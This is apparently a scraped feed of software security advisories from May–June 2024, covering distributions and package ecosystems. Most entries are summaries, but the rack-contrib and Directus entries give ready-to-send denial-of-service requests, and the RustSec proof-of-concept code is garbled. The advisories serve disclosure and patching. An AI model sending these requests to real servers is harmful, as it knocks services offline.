30.05.2024 14:38:31	ubuntu	[USN-6801-1] PyMySQL vulnerability	PyMySQL could be vulnerable to SQL injection attacks.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6801-1
30.05.2024 13:12:04	ubuntu	[USN-6800-1] browserify-sign vulnerability (high)	browserify-sign could allow unintended access if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6800-1
30.05.2024 23:12:44	almalinux	[ALSA-2024:3501] nghttp2 security update (moderate)	nghttp2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3501
30.05.2024 23:11:01	almalinux	[ALSA-2024:3513] less security update (important)	less security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3513
30.05.2024 03:00:00	cisa	[CISA-2024:0530] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0530
30.05.2024 03:00:00	oraclelinux	[ELSA-2024-3513] less security update (important)	[590-4]- Fix CVE-2024-32487- Resolves: RHEL-33773	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3513
30.05.2024 03:00:00	redhat	[RHSA-2024:3501] nghttp2 security update (moderate)	libnghttp2 is a library implementing the Hypertext Transfer Protocol version 2 (HTTP/2) protocol in C.Security Fix(es):* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3501
30.05.2024 03:00:00	redhat	[RHSA-2024:3513] less security update (important)	The "less" utility is a text file browser that resembles "more", but allows users to move backwards in the file as well as forwards. Since "less" does not read the entire input file at startup, it also starts more quickly than ordinary text editors.Security Fix(es):* less: OS command injection (CVE-2024-32487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3513
30.05.2024 03:00:00	redhat	[RHSA-2024:3500] ruby:3.0 security update (moderate)	Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)* ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3500
30.05.2024 05:34:10	rubysec	[RUBYSEC:RACK-CONTRIB-2024-35231] Denial of Service in rack-contrib via "profiler_runs" parameter (high)	rack-contrib prior to version 2.5.0 is vulnerable to a Denial of Servicevia the `profiler_runs` HTTP request parameter.Versions Affected: < 2.5.0Fixed Versions: >= 2.5.0# ImpactAn attacker can trigger a Denial of Service by sending an HTTP request withan overly large `profiler_runs` parameter.```shellcurl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"```# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-CONTRIB-2024-35231
30.05.2024 05:49:06	rubysec	[RUBYSEC:KAMINARI-2024-32978] Insecure File Permissions vulnerability in kaminari (medium)	kaminari versions prior to 0.16.2 are vulnerable to an Insecure FilePermissions vulnerability, where certain files within the kaminari gem haveinsecure file permissions.Versions Affected: < 0.16.2Fixed Versions: >= 0.16.2# ImpactAn attacker with local access could write arbitrary code to the affected filesresulting in arbitrary code execution.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsManually set the permissions of the affected files to `644`.## All Affected Versions:```lib/kaminari/models/page_scope_methods.rb```## Version 0.15.0 and 0.15.1:```spec/models/mongo_mapper/mongo_mapper_spec.rb```## Version 0.16.0:```spec/models/mongo_mapper/mongo_mapper_spec.rbspec/models/mongoid/mongoid_spec.rb```## Version 0.16.1:```spec/models/active_record/scopes_spec.rbspec/models/mongo_mapper/mongo_mapper_spec.rbspec/models/mongoid/mongoid_spec.rbgemfiles/data_mapper_12.gemfilegemfiles/active_record_32.gemfile```	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:KAMINARI-2024-32978
31.05.2024 16:34:12	ubuntu	[USN-6804-1] GNU C Library vulnerabilities	Several security issues were fixed in GNU C Library.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6804-1
31.05.2024 03:00:00	debian	[DSA-5701-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5701-1
31.05.2024 17:51:49	almalinux	[ALSA-2024:3500] ruby:3.0 security update (moderate)	ruby:3.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3500
31.05.2024 18:26:20	almalinux	[ALSA-2024:3466] python39:3.9 and python39-devel:3.9 security update (important)	python39:3.9 and python39-devel:3.9 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3466
01.06.2024 03:00:00	debian	[DSA-5702-1] gst-plugins-base1.0 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5702-1
03.06.2024 01:30:03	maven	[MAVEN:GHSA-973X-65J7-XCF4] Decompressors can crash the JVM and leak memory content in Aircompressor (high)	### SummaryAll decompressor implementations of Aircompressor (LZ4, LZO, Snappy, Zstandard) can crash the JVM for certain input, and in some cases also leak the content of other memory of the Java process (which could contain sensitive information).### DetailsWhen decompressing certain data, the decompressors try to access memory outside the bounds of the given byte arrays or byte buffers. Because Aircompressor uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM.Users should update to Aircompressor 0.27 or newer where these issues have been fixed.### ImpactWhen decompressing data from untrusted users, this can be exploited for a denial-of-service attack by crashing the JVM, or to leak other sensitive information from the Java process.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-973X-65J7-XCF4
03.06.2024 01:29:30	npm	[NPM:GHSA-2P57-RM9W-GVFP] ip SSRF improper categorization in isPublic (high)	The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2P57-RM9W-GVFP
02.06.2024 03:00:00	debian	[DSA-5703-1] linux (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5703-1
03.06.2024 01:32:11	npm	[NPM:GHSA-9HFW-CVF4-5X25] wanEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function (moderate)	There is a cross-site scripting (XSS) issue in wanEditor via the image upload function in version 4.7.11. This issue has been fixed in version 4.7.12.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9HFW-CVF4-5X25
03.06.2024 03:00:00	cisa	[CISA-2024:0603] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0603
03.06.2024 03:00:00	oraclelinux	[ELSA-2024-3546] ruby:3.1 security, bug fix, and enhancement update (moderate)	ruby[3.1.5-143]- Upgrade to Ruby 3.1.5. Resolves: RHEL-35748- Fix buffer overread vulnerability in StringIO. Resolves: RHEL-35749- Fix RCE vulnerability with .rdoc_options in RDoc. Resolves: RHEL-35750- Fix arbitrary memory address read vulnerability with Regex search. Resolves: RHEL-35751rubygem-abrtrubygem-mysql2rubygem-pg	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3546
03.06.2024 03:00:00	redhat	[RHSA-2024:3546] ruby:3.1 security, bug fix, and enhancement update (moderate)	Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.Security Fix(es):* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)* ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282)For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3546
03.06.2024 10:19:16	rustsec	[RUSTSEC-2024-0343] Reduced entropy due to inadequate character set usage	## DescriptionAffected versions of the nano-id crate incorrectly generated IDs using a reduced character set in the `nano_id::base62` and `nano_id::base58` functions. Specifically, the `base62` function used a character set of 32 symbols instead of the intended 62 symbols, and the `base58` function used a character set of 16 symbols instead of the intended 58 symbols. Additionally, the `nano_id::gen` macro is also affected when a custom character set that is not a power of 2 in size is specified.It should be noted that `nano_id::base64` is not affected by this vulnerability.## ImpactThis can result in a significant reduction in entropy, making the generated IDs predictable and vulnerable to brute-force attacks when the IDs are used in security-sensitive contexts such as session tokens or unique identifiers.## PatchesThe flaws were corrected in commit [a9022772b2f1ce38929b5b81eccc670ac9d3ab23](https://github.com/viz-rs/nano-id/commit/a9022772b2f1ce38929b5b81eccc670ac9d3ab23) by updating the the `nano_id::gen` macro to use all specified characters correctly.## PoC```rustuse std::collections::BTreeSet;fn main() { test_base58(); test_base62();}fn test_base58() { let mut produced_symbols = BTreeSet::new(); for _ in 0..100_000 {id = "RUSTSEC-2024-0343" for c in id.chars() { produced_symbols.insert(c); } } println!( "{} symbols generated from nano_id::base58", produced_symbols.len() );}fn test_base62() { let mut produced_symbols = BTreeSet::new(); for _ in 0..100_000 {id = "RUSTSEC-2024-0343" for c in id.chars() { produced_symbols.insert(c); } } println!( "{} symbols generated from nano_id::base62", produced_symbols.len() );}```	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0343
03.06.2024 15:25:41	rubysec	[RUBYSEC:ACTIVEADMIN-2024-37031] activeadmin vulnerable to stored persistent cross-site scripting (XSS) in dynamic form legends (high)	### ImpactUsers settings their active admin form legends dynamically may bevulnerable to stored XSS, as long as its value can be injecteddirectly by a malicious user.For example:* A public web application allows users to create entities with arbitrary names.* Active Admin is used to administrate these entities through a private backend.* The form to edit these entities in the private backend has the following shape (note the dynamic `name` value dependent on an attribute of the `resource`):```ruby form do \|f\| f.inputs name: resource.name do f.input :name f.input :description end f.actions end```Then a malicious user could create an entity with a payload thatwould get executed in the active admin administrator's browser.Both `form` blocks with an implicit or explicit name (i.e., both`form resource.name` or `form name: resource.name` would sufferfrom the problem), where the value of the name can be arbitrarilyset by non admin users.### PatchesThe problem has been fixed in ActiveAdmin 3.2.2 and ActiveAdmin 4.0.0.beta7.### WorkaroundsUsers can workaround this problem without upgrading by explicitlyescaping the form name using an HTML escaping utility. For example:```ruby form do \|f\| f.inputs name: ERB::Util.html_escape(resource.name) do f.input :name f.input :description end f.actions end```Upgrading is of course recommended though.### Referenceshttps://owasp.org/www-community/attacks/xss/#stored-xss-attacks	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIVEADMIN-2024-37031
04.06.2024 03:38:13	npm	[NPM:GHSA-9HFW-CVF4-5X25] wangEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function (moderate)	There is a cross-site scripting (XSS) issue in wangEditor via the image upload function in version 4.7.11. This issue has been fixed in version 4.7.12.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9HFW-CVF4-5X25
05.06.2024 01:25:15	go	[GO-2024-2887] Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses in net/netip	The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected forIPv4-mapped IPv6 addresses, returning false for addresses which would returntrue in their traditional IPv4 forms.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2887
05.06.2024 01:25:15	go	[GO-2024-2888] Mishandling of corrupt central directory record in archive/zip	The archive/zip package's handling of certain types of invalid zip files differsfrom the behavior of most zip implementations. This misalignment could beexploited to create an zip file with contents that vary depending on theimplementation reading the file. The archive/zip package now rejects filescontaining these errors.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2888
04.06.2024 20:53:30	npm	[NPM:GHSA-632P-P495-25M5] Directus is soft-locked by providing a string value to random string util (high)	### Describe the BugProviding a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID.### To Reproduce1. Test if the endpoint is working and accessible, `GET http://localhost:8055/utils/random/string`2. Do a bad request `GET http://localhost:8055/utils/random/string?length=foo`3. After this all calls to `GET http://localhost:8055/utils/random/string` will return an empty string instead of a random string4. In this error situation you'll see authentication refreshes fail for the app and api.### ImpactThis counts as an unauthenticated denial of service attack vector so this impacts all unpatched instances reachable over the internet.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-632P-P495-25M5
04.06.2024 20:38:32	maven	[MAVEN:GHSA-8WH2-6QHJ-H7J9] iq80 Snappy out-of-bounds read when uncompressing data, leading to JVM crash (moderate)	### Summaryiq80 Snappy performs out-of-bounds read access when uncompressing certain data, which can lead to a JVM crash.### DetailsWhen uncompressing certain data, Snappy tries to read outside the bounds of the given byte arrays. Because Snappy uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM.iq80 Snappy is not actively maintained anymore. As quick fix users can upgrade to version 0.5, but in the long term users should prefer migrating to the Snappy implementation in https://github.com/airlift/aircompressor (version 0.27 or newer).### ImpactWhen uncompressing data from untrusted users, this can be exploited for a denial-of-service attack by crashing the JVM.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8WH2-6QHJ-H7J9
04.06.2024 18:13:56	npm	[NPM:GHSA-9P6P-8V9R-8C9M] javascript-deobfuscator crafted payload can lead to code execution (high)	javascript-deobfuscator removes common JavaScript obfuscation techniques. Crafted payloads targeting expression simplification can lead to code execution. This issue has been patched in version 1.1.0.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9P6P-8V9R-8C9M
04.06.2024 16:29:52	ubuntu	[USN-6805-1] libarchive vulnerability (high)	libarchive could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6805-1
04.06.2024 19:20:31	go	[GO-2024-2727] Constellation has pods exposed to peers in VPC in github.com/edgelesssys/constellation/v2		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2727
04.06.2024 21:07:39	maven	[MAVEN:GHSA-4W54-WWC9-X62C] Silverpeas authentication bypass (high)	Silverpeas before 6.3.5 allows authentication bypass by omitting the Password field to AuthenticationServlet, often providing an unauthenticated user with superadmin access.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4W54-WWC9-X62C
04.06.2024 17:40:17	android	[ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)	In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078
07.06.2024 01:58:48	npm	[NPM:GHSA-WJMJ-H3XC-HXP8] Generation of Error Message Containing Sensitive Information in zsa (moderate)	### ImpactAll users are impacted. The zsa application transfers the parse error stack from the server to the client in production build mode. This can potentially reveal sensitive information about the server environment, such as the machine username and directory paths. An attacker could exploit this vulnerability to gain unauthorized access to sensitive server information. This information could be used to plan further attacks or gain a deeper understanding of the server infrastructure.### PatchesYes, this has been pathed on `0.3.3`### WorkaroundsNo way to fix other than the patch.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WJMJ-H3XC-HXP8
06.06.2024 20:15:51	alpinelinux	[ALPINE:CVE-2024-33655] unbound vulnerability	[From CVE-2024-33655] The DNS protocol in RFC 1035 and updates allows remote attackers to cause a denial of service (resource consumption) by arranging for DNS queries to be accumulated for seconds, such that responses are later sent in a pulsing burst (which can be considered traffic amplification in some cases), aka the "DNSBomb" issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-33655
06.06.2024 15:57:53	almalinux	[ALSA-2024:3667] cockpit security update (moderate)	cockpit security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3667
06.06.2024 15:55:39	almalinux	[ALSA-2024:3666] tomcat security and bug fix update (important)	tomcat security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3666
06.06.2024 16:02:22	almalinux	[ALSA-2024:3668] ruby:3.1 security, bug fix, and enhancement update (moderate)	ruby:3.1 security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3668
06.06.2024 03:00:00	oraclelinux	[ELSA-2024-3666] tomcat security and bug fix update (important)	[1:9.0.87-1.el8_10.1]- Resolves: RHEL-38548 - Amend tomcat package's changelog so that fixed CVEs are mentioned explicitly- Resolves: RHEL-35813 - Rebase tomcat to version 9.0.87- Resolves: RHEL-29255 tomcat: Apache Tomcat: WebSocket DoS with incomplete closing handshake (CVE-2024-23672)- Resolves: RHEL-29250 tomcat: Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3666
06.06.2024 03:00:00	oraclelinux	[ELSA-2024-3667] cockpit security update (moderate)	[310.4-1.0.1]- Update documentation links [Orabug: 34706402]- Drop subscription-manager-cockpit requirement for ol [Orabug: 34681110]- Remove duplicate reference to server in cockpit [Orabug: 33862832]- Update documentation links [Orabug: 32795691]- Make documentation links point to Oracle Linux information [Orabug: 30271413] [Orabug: 32013095]- Fix rendering of hwinfo page on systems with some empty memory slots [Orabug: 32826970][310.4-1]- sosreport: Fix command injection with crafted report names [CVE-2024-2947] (jira#RHEL-30452)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3667
06.06.2024 03:00:00	oraclelinux	[ELSA-2024-3669] less security update (important)	[458-10]- Fix CVE-2024-32487- Resolves: RHEL-32802	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3669
06.06.2024 03:00:00	oraclelinux	[ELSA-2024-3619] kernel security and bug fix update (moderate)	- [5.14.0-427.20.1_4.OL9]- Disable UKI signing [Orabug: 36571828]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]- Add Oracle Linux IMA certificates[5.14.0-427.20.1_4]- ipv6: sr: fix possible use-after-free and null-ptr-deref (Hangbin Liu) [RHEL-33968 RHEL-31732] {CVE-2024-26735}- idpf: fix kernel panic on unknown packet types (Michal Schmidt) [RHEL-36145 RHEL-29035]- idpf: refactor some missing field get/prep conversions (Michal Schmidt) [RHEL-36145 RHEL-29035]- PCI: Fix pci_rh_check_status() call semantics (Luiz Capitulino) [RHEL-36541 RHEL-35032]- cxgb4: Properly lock TX queue for the selftest. (John B. Wyatt IV) [RHEL-36530 RHEL-31990 RHEL-9354][5.14.0-427.19.1_4]- x86/mce: Cleanup mce_usable_address() (Prarit Bhargava) [RHEL-33810 RHEL-25415]- x86/mce: Define amd_mce_usable_address() (Prarit Bhargava) [RHEL-33810 RHEL-25415]- x86/MCE/AMD: Split amd_mce_is_memory_error() (Prarit Bhargava) [RHEL-33810 RHEL-25415]- fs: sysfs: Fix reference leak in sysfs_break_active_protection() (Ewan D. Milne) [RHEL-35302 RHEL-35078] {CVE-2024-26993}	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3619
05.06.2024 23:10:42	ubuntu	[USN-6808-1] Atril vulnerability	Atril could be made to create arbitrary files when opening a speciallycrafted EPUB file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6808-1
05.06.2024 22:56:58	ubuntu	[USN-6809-1] BlueZ vulnerabilities	Several security issues were fixed in BlueZ.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6809-1
05.06.2024 22:11:11	slackware	[SSA:2024-157-01] Slackware 15.0 kernel	New kernel packages are available for Slackware 15.0 to fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/linux-5.15.160/: Upgraded. These updates fix various bugs and security issues. Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 5.15.147: https://www.cve.org/CVERecord?id=CVE-2023-52340 https://www.cve.org/CVERecord?id=CVE-2023-6040 https://www.cve.org/CVERecord?id=CVE-2024-0646 Fixed in 5.15.148: https://www.cve.org/CVERecord?id=CVE-2023-46838 https://www.cve.org/CVERecord?id=CVE-2023-52436 https://www.cve.org/CVERecord?id=CVE-2023-52438 https://www.cve.org/CVERecord?id=CVE-2023-52439 https://www.cve.org/CVERecord?id=CVE-2023-52443 https://www.cve.org/CVERecord?id=CVE-2023-52444 https://www.cve.org/CVERecord?id=CVE-2023-52445 https://www.cve.org/CVERecord?id=CVE-2023-52448 https://www.cve.org/CVERecord?id=CVE-2023-52449 https://www.cve.org/CVERecord?id=CVE-2023-52451 https://www.cve.org/CVERecord?id=CVE-2023-52454 https://www.cve.org/CVERecord?id=CVE-2023-52456 https://www.cve.org/CVERecord?id=CVE-2023-52458 https://www.cve.org/CVERecord?id=CVE-2023-52463 https://www.cve.org/CVERecord?id=CVE-2023-52464 https://www.cve.org/CVERecord?id=CVE-2023-52467 https://www.cve.org/CVERecord?id=CVE-2023-52469 https://www.cve.org/CVERecord?id=CVE-2023-52470 https://www.cve.org/CVERecord?id=CVE-2023-52609 https://www.cve.org/CVERecord?id=CVE-2023-52610 https://www.cve.org/CVERecord?id=CVE-2023-52612 https://www.cve.org/CVERecord?id=CVE-2023-6356 https://www.cve.org/CVERecord?id=CVE-2023-6536 https://www.cve.org/CVERecord?id=CVE-2023-6915 https://www.cve.org/CVERecord?id=CVE-2024-1085 https://www.cve.org/CVERecord?id=CVE-2024-24860 https://www.cve.org/CVERecord?id=CVE-2024-26586 https://www.cve.org/CVERecord?id=CVE-2024-26589 https://www.cve.org/CVERecord?id=CVE-2024-26591 https://www.cve.org/CVERecord?id=CVE-2024-26597 https://www.cve.org/CVERecord?id=CVE-2024-26598 https://www.cve.org/CVERecord?id=CVE-2024-26631 https://www.cve.org/CVERecord?id=CVE-2024-26633 Fixed in 5.15.149: https://www.cve.org/CVERecord?id=CVE-2023-52429 https://www.cve.org/CVERecord?id=CVE-2023-52435 https://www.cve.org/CVERecord?id=CVE-2023-52486 https://www.cve.org/CVERecord?id=CVE-2023-52489 https://www.cve.org/CVERecord?id=CVE-2023-52491 https://www.cve.org/CVERecord?id=CVE-2023-52492 https://www.cve.org/CVERecord?id=CVE-2023-52493 https://www.cve.org/CVERecord?id=CVE-2023-52494 https://www.cve.org/CVERecord?id=CVE-2023-52498 https://www.cve.org/CVERecord?id=CVE-2023-52583 https://www.cve.org/CVERecord?id=CVE-2023-52587 https://www.cve.org/CVERecord?id=CVE-2023-52588 https://www.cve.org/CVERecord?id=CVE-2023-52594 https://www.cve.org/CVERecord?id=CVE-2023-52595 https://www.cve.org/CVERecord?id=CVE-2023-52597 https://www.cve.org/CVERecord?id=CVE-2023-52598 https://www.cve.org/CVERecord?id=CVE-2023-52599 https://www.cve.org/CVERecord?id=CVE-2023-52600 https://www.cve.org/CVERecord?id=CVE-2023-52601 https://www.cve.org/CVERecord?id=CVE-2023-52602 https://www.cve.org/CVERecord?id=CVE-2023-52603 https://www.cve.org/CVERecord?id=CVE-2023-52604 https://www.cve.org/CVERecord?id=CVE-2023-52606 https://www.cve.org/CVERecord?id=CVE-2023-52607 https://www.cve.org/CVERecord?id=CVE-2023-52608 https://www.cve.org/CVERecord?id=CVE-2023-52614 https://www.cve.org/CVERecord?id=CVE-2023-52615 https://www.cve.org/CVERecord?id=CVE-2023-52616 https://www.cve.org/CVERecord?id=CVE-2023-52617 https://www.cve.org/CVERecord?id=CVE-2023-52618 https://www.cve.org/CVERecord?id=CVE-2023-52619 https://www.cve.org/CVERecord?id=CVE-2023-52622 https://www.cve.org/CVERecord?id=CVE-2023-52623 https://www.cve.org/CVERecord?id=CVE-2023-52627 https://www.cve.org/CVERecord?id=CVE-2023-52630 https://www.cve.org/CVERecord?id=CVE-2023-52631 https://www.cve.org/CVERecord?id=CVE-2023-52633 https://www.cve.org/CVERecord?id=CVE-2023-52635 https://www.cve.org/CVERecord?id=CVE-2023-52637 https://www.cve.org/CVERecord?id=CVE-2023-52638 https://www.cve.org/CVERecord?id=CVE-2024-0340 https://www.cve.org/CVERecord?id=CVE-2024-1086 https://www.cve.org/CVERecord?id=CVE-2024-1151 https://www.cve.org/CVERecord?id=CVE-2024-23849 https://www.cve.org/CVERecord?id=CVE-2024-23850 https://www.cve.org/CVERecord?id=CVE-2024-23851 https://www.cve.org/CVERecord?id=CVE-2024-26592 https://www.cve.org/CVERecord?id=CVE-2024-26593 https://www.cve.org/CVERecord?id=CVE-2024-26594 https://www.cve.org/CVERecord?id=CVE-2024-26600 https://www.cve.org/CVERecord?id=CVE-2024-26602 https://www.cve.org/CVERecord?id=CVE-2024-26606 https://www.cve.org/CVERecord?id=CVE-2024-26608 https://www.cve.org/CVERecord?id=CVE-2024-26610 https://www.cve.org/CVERecord?id=CVE-2024-26614 https://www.cve.org/CVERecord?id=CVE-2024-26615 https://www.cve.org/CVERecord?id=CVE-2024-26625 https://www.cve.org/CVERecord?id=CVE-2024-26627 https://www.cve.org/CVERecord?id=CVE-2024-26635 https://www.cve.org/CVERecord?id=CVE-2024-26636 https://www.cve.org/CVERecord?id=CVE-2024-26640 https://www.cve.org/CVERecord?id=CVE-2024-26641 https://www.cve.org/CVERecord?id=CVE-2024-26644 https://www.cve.org/CVERecord?id=CVE-2024-26645 https://www.cve.org/CVERecord?id=CVE-2024-26660 https://www.cve.org/CVERecord?id=CVE-2024-26663 https://www.cve.org/CVERecord?id=CVE-2024-26664 https://www.cve.org/CVERecord?id=CVE-2024-26665 https://www.cve.org/CVERecord?id=CVE-2024-26668 https://www.cve.org/CVERecord?id=CVE-2024-26671 https://www.cve.org/CVERecord?id=CVE-2024-26673 https://www.cve.org/CVERecord?id=CVE-2024-26675 https://www.cve.org/CVERecord?id=CVE-2024-26676 https://www.cve.org/CVERecord?id=CVE-2024-26679 https://www.cve.org/CVERecord?id=CVE-2024-26684 https://www.cve.org/CVERecord?id=CVE-2024-26685 https://www.cve.org/CVERecord?id=CVE-2024-26689 https://www.cve.org/CVERecord?id=CVE-2024-26696 https://www.cve.org/CVERecord?id=CVE-2024-26697 https://www.cve.org/CVERecord?id=CVE-2024-26698 https://www.cve.org/CVERecord?id=CVE-2024-26702 https://www.cve.org/CVERecord?id=CVE-2024-26704 https://www.cve.org/CVERecord?id=CVE-2024-26707 https://www.cve.org/CVERecord?id=CVE-2024-26712 https://www.cve.org/CVERecord?id=CVE-2024-26715 https://www.cve.org/CVERecord?id=CVE-2024-26717 https://www.cve.org/CVERecord?id=CVE-2024-26720 https://www.cve.org/CVERecord?id=CVE-2024-26727 https://www.cve.org/CVERecord?id=CVE-2024-26808 Fixed in 5.15.150: https://www.cve.org/CVERecord?id=CVE-2023-52434 https://www.cve.org/CVERecord?id=CVE-2023-52497 https://www.cve.org/CVERecord?id=CVE-2023-52640 https://www.cve.org/CVERecord?id=CVE-2023-52641 https://www.cve.org/CVERecord?id=CVE-2024-0565 https://www.cve.org/CVERecord?id=CVE-2024-26601 https://www.cve.org/CVERecord?id=CVE-2024-26603 https://www.cve.org/CVERecord?id=CVE-2024-26733 https://www.cve.org/CVERecord?id=CVE-2024-26735 https://www.cve.org/CVERecord?id=CVE-2024-26736 https://www.cve.org/CVERecord?id=CVE-2024-26737 https://www.cve.org/CVERecord?id=CVE-2024-26743 https://www.cve.org/CVERecord?id=CVE-2024-26744 https://www.cve.org/CVERecord?id=CVE-2024-26747 https://www.cve.org/CVERecord?id=CVE-2024-26748 https://www.cve.org/CVERecord?id=CVE-2024-26749 https://www.cve.org/CVERecord?id=CVE-2024-26751 https://www.cve.org/CVERecord?id=CVE-2024-26752 https://www.cve.org/CVERecord?id=CVE-2024-26754 https://www.cve.org/CVERecord?id=CVE-2024-26763 https://www.cve.org/CVERecord?id=CVE-2024-26764 https://www.cve.org/CVERecord?id=CVE-2024-26766 https://www.cve.org/CVERecord?id=CVE-2024-26769 https://www.cve.org/CVERecord?id=CVE-2024-26771 https://www.cve.org/CVERecord?id=CVE-2024-26772 https://www.cve.org/CVERecord?id=CVE-2024-26773 https://www.cve.org/CVERecord?id=CVE-2024-26774 https://www.cve.org/CVERecord?id=CVE-2024-26776 https://www.cve.org/CVERecord?id=CVE-2024-26777 https://www.cve.org/CVERecord?id=CVE-2024-26778 https://www.cve.org/CVERecord?id=CVE-2024-26779 